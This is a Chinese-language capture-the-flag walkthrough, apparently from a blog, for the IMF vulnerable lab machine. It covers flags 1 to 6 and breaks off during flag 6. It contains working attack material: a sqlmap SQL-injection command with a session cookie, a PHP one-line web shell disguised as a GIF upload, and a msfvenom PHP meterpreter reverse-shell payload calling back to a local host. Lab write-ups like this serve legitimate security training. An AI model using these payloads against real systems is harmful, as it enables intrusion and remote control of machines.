首先:
扫描同网段的地址
扫描出IP地址后,扫描它的的端口信息
flag1
查看80端口下的源码
找到了flag1和三个邮箱
flag2
还是查看源码,在开始界面查看源码,发现加密的js文件名,解密查看
拼接
ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==
解密,出flag2
flag2{aW1mYWRtaW5pc3RyYXRvcg==}
发现里面还有一个base64加密,解密
imfadministrator
flag3
上一个解密出的imfadministrator是该IP的目录
拼接
再拿第一个flag查出的三个邮箱进行用户名尝试
查看源码,发现用了PHP硬密码进行编译
抓吧,密码用数组绕过
base64解码结果:
flag3{continueTOcms}
flag4
拿cms.php?pagename=home再次拼接目录,进入账户
源码什么都没有,加一点有sql注入
sqlmap去跑
获取数据库数据
sqlmap -u 'http://192.168.58.132/imfadministrator/cms.php?pagename=home%27' --cookie 'PHPSESSID=t91ih9vdanggv3ob2nkd8kmce4' --dump
查看有一张图片目录,拼接查看
一张二维码,进行解密
flag4{dXBsb2Fkcjk0Mi5waHA=}
flag5
再base64解密
dXBsb2Fkcjk0Mi5waHA=
继续进行拼接,一个文件上传
写一个一句话木马文件,并上传
<?php $s=$_GET['s']; echo `$s`; ?>
失败
添加GIF464564546(木马)并改为gif文件即可
上传
查看所有文件
再查看flag5
flag5{YWdlbnRzZXJ2aWNlcw==}
解码后得到提示 <font style="color:rgb(51, 51, 51);">agentservices</font>
agentservices
flag6
写一个脚本并上传
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.190.1 LPORT=4444 -e php/base64 -f raw > msf.php
标签:查看,IMF,base64,解密,拼接,源码,靶场,php
From: https://blog.csdn.net/Zx244349115/article/details/143693282